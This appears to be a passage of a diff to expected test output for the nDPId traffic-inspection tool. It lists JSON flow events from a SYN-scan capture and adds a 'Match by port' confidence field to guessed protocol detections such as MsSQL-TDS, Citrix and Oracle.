 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4190,13 +4190,13 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","ndpi": {"proto":"Citrix","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","ndpi": {"proto":"Citrix","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4228,9 +4228,9 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","ndpi": {"proto":"Oracle","breed":"Acceptable","category":"Database"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","ndpi": {"proto":"Oracle","breed":"Acceptable","category":"Database"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}}
